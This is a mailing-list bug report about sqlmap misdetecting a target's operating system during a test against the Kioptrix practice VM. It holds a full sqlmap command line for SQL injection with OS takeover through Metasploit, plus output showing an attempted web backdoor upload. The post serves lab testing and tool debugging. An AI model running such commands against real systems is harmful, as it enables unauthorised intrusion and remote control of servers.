[sqlmap-users] Bug - Incorrect OS Detection?
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] Bug - Incorrect OS Detection?
|
From: Anthony B. <ab...@gm...> - 2011-04-20 19:53:38
|
Hello,
sqlmap is not detecting the proper OS when I try to use various options,
such as --os-cmd and --os-pwn. I have been testing against the Kioptrix
Level 2 VM Challenge. Whenever I am prompted for the web server path, it
will not accept a valid linux path. As you can see from the below output, it
properly shows "Linux Centos 4", and then for some reason switches to seeing
Windows as the OS.
./sqlmap.py -u "http://192.168.1.21/index.php" --data "uname=foo&psw=bar"
--dbms=MySQL --level=5 --risk=3 --os="Linux" --os-pwn
--msf-path="/storage/tools/framework3/"
there were multiple injection points, please select the one to use for
following injections:
[0] place: POST, parameter: uname, type: Single quoted string (default)
[1] place: POST, parameter: psw, type: Single quoted string
[q] Quit
> 0
[12:39:34] [INFO] testing MySQL
[12:39:48] [INFO] confirming MySQL
[12:40:16] [WARNING] adjusting time delay to 1 second (due to good response
times)
[12:40:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL < 5.0.0
[12:40:16] [INFO] fingerprinting the back-end DBMS operating system
[12:40:16] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[12:40:22] [INFO] going to use a web backdoor to establish the tunnel
[12:40:22] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:40:24] [WARNING] unable to retrieve the web server document root
please provide the web server document root
[C:/xampp/htdocs/,C:/Inetpub/wwwroot/]:
[12:40:27] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the
agent [Enter for None]:
[12:40:27] [WARNING] unable to upload the file stager on 'C:/xampp/htdocs'
[12:40:27] [WARNING] unable to upload the file stager on
'C:/Inetpub/wwwroot'
[12:40:27] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 2 times
[12:40:27] [INFO] Fetched data logged to text files under
'/storage/tools/sqlmap-dev/output/192.168.1.21'
[*] shutting down at: 12:40:27
./sqlmap.py --version
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
sqlmap/1.0-dev
|
